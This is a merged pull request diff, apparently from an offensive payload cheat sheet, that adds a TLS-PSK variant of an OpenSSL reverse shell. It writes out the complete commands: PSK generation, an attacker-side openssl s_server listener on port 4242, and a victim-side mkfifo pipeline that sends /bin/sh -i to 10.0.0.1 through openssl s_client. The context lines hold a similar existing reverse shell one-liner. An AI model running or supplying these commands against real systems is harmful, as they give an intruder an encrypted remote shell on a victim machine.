Merge pull request #225 from artiommocrenco/patch-1
Add TLS-PSK OpenSSL reverse shell method
commit
cd3de64c73
@ -175,6 +175,17 @@ user@attack$ ncat --ssl -vv -l -p 4242
user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
```
TLS-PSK (does not rely on PKI or self-signed certificates)
```bash
# generate 384-bit PSK
# use the generated string as a value for the two PSK variables from below
openssl rand -hex 48
# server (attacker)
export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT
# client (victim)
export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE
```
### Powershell
```powershell